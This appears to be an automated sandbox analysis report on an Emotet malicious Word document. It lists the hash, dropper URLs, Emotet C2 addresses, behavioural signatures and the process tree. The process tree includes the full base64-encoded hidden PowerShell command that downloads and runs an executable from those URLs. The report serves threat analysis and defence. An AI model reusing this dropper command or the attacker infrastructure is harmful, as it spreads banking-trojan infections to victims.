Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    19-12-2019 17:27

General

  • Target

    329915e7a80ca2eaa941d1e7dd96c6308f5cdf054dbf8e8d546ae0571e5ebd43

  • Sample

    191219-zp32rwfa7s

  • SHA256

    329915e7a80ca2eaa941d1e7dd96c6308f5cdf054dbf8e8d546ae0571e5ebd43

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://pcms.bridgeimprex.com/zAqMf/

exe.dropper

http://test.a1enterprise.com/jxl/xo/

exe.dropper

http://app.bridgeimpex.org/img/H4sNbg51/

exe.dropper

http://a1enterprises.com/wp-content/BpOszbMoI/

exe.dropper

http://isabella.makeyourselfelaborate.com/wp-admin/u19xl/

Extracted

Family

emotet

C2

47.149.28.234:80

71.83.82.123:8080

200.114.167.85:80

108.61.99.179:8080

165.227.156.155:443

159.69.89.130:8080

167.99.105.223:7080

188.152.7.140:80

91.73.197.90:80

120.150.246.241:80

91.205.215.66:443

87.230.19.21:8080

75.80.148.244:80

138.122.5.214:8080

219.78.255.48:80

104.131.11.150:8080

121.88.5.176:443

178.209.71.63:8080

179.13.185.19:80

12.176.19.218:80

rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\329915e7a80ca2eaa941d1e7dd96c6308f5cdf054dbf8e8d546ae0571e5ebd43.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    PID:4800
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABZAHoAeAB5AHkAcQB4AGoAPQAnAFMAagBmAHcAbQB5AGUAbQAnADsAJABFAGQAbgB3AG8AYgByAHUAZQBuAHkAbwAgAD0AIAAnADkAMwAyACcAOwAkAFEAYwBtAG4AbwBjAHYAcgBjAGUAZQBlAD0AJwBKAHgAYgB4AHEAdAB2AGcAbABkAGYAdwB2ACcAOwAkAFcAcQBjAHQAawBiAHcAagB2AHoAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBkAG4AdwBvAGIAcgB1AGUAbgB5AG8AKwAnAC4AZQB4AGUAJwA7ACQASgBsAHEAcABqAGgAdwBsAGwAPQAnAEMAcgB0AHgAbgBlAGcAeQBjAGIAZAAnADsAJABLAHAAegByAGcAdABvAGIAcwBwAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAdAAuAHcAZQBCAEMAbABJAEUATgB0ADsAJABPAGsAbgBmAG0AZQBsAHQAPQAnAGgAdAB0AHAAOgAvAC8AcABjAG0AcwAuAGIAcgBpAGQAZwBlAGkAbQBwAHIAZQB4AC4AYwBvAG0ALwB6AEEAcQBNAGYALwAqAGgAdAB0AHAAOgAvAC8AdABlAHMAdAAuAGEAMQBlAG4AdABlAHIAcAByAGkAcwBlAC4AYwBvAG0ALwBqAHgAbAAvAHgAbwAvACoAaAB0AHQAcAA6AC8ALwBhAHAAcAAuAGIAcgBpAGQAZwBlAGkAbQBwAGUAeAAuAG8AcgBnAC8AaQBtAGcALwBIADQAcwBOAGIAZwA1ADEALwAqAGgAdAB0AHAAOgAvAC8AYQAxAGUAbgB0AGUAcgBwAHIAaQBzAGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEIAcABPAHMAegBiAE0AbwBJAC8AKgBoAHQAdABwADoALwAvAGkAcwBhAGIAZQBsAGwAYQAuAG0AYQBrAGUAeQBvAHUAcgBzAGUAbABmAGUAbABhAGIAbwByAGEAdABlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1ADEAOQB4AGwALwAnAC4AIgBTAHAAYABMAGkAdAAiACgAJwAqACcAKQA7ACQAVwB4AGoAcgBpAGgAcwBnAG4APQAnAFMAbwBwAG8AcQBtAGwAcABvAGMAcgBlACcAOwBmAG8AcgBlAGEAYwBoACgAJABWAHUAZQBpAGYAaQB5AHUAcQBpAGMAcQAgAGkAbgAgACQATwBrAG4AZgBtAGUAbAB0ACkAewB0AHIAeQB7ACQASwBwAHoAcgBnAHQAbwBiAHMAcAAuACIARABvAHcAYABOAGAATABvAEEAZABGAEkATABFACIAKAAkAFYAdQBlAGkAZgBpAHkAdQBxAGkAYwBxACwAIAAkAFcAcQBjAHQAawBiAHcAagB2AHoAdgApADsAJABQAGIAcAB4AGYAZQBmAHcAaQBzAGwAPQAnAEQAZQBxAGgAcABnAHoAZQB6ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVwBxAGMAdABrAGIAdwBqAHYAegB2ACkALgAiAEwARQBuAGAARwB0AEgAIgAgAC0AZwBlACAAMwAxADUAMQA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAFcAcQBjAHQAawBiAHcAagB2AHoAdgApADsAJABQAHAAbgBhAGYAZgB0AHcAZAA9ACcARABqAGgAZwBuAHcAZgB3AGMAJwA7AGIAcgBlAGEAawA7ACQASQBsAHkAdgBjAHgAbgBqAHEAPQAnAFAAcABwAHMAdwBkAG4AcgBiAGMAawB5AG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBsAGgAdQBzAHAAcABpAGgAPQAnAEoAYwB2AGoAdABjAHQAZgAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Users\Admin\932.exe
      "C:\Users\Admin\932.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4448
      • C:\Users\Admin\932.exe
        --6a4693d6
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4564

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\932.exe
  • C:\Users\Admin\932.exe
  • C:\Users\Admin\932.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • memory/4448-10-0x0000000002280000-0x0000000002297000-memory.dmp
    Filesize

    92KB

  • memory/4564-13-0x0000000002140000-0x0000000002157000-memory.dmp
    Filesize

    92KB

  • memory/4564-14-0x0000000000400000-0x0000000000486000-memory.dmp
    Filesize

    536KB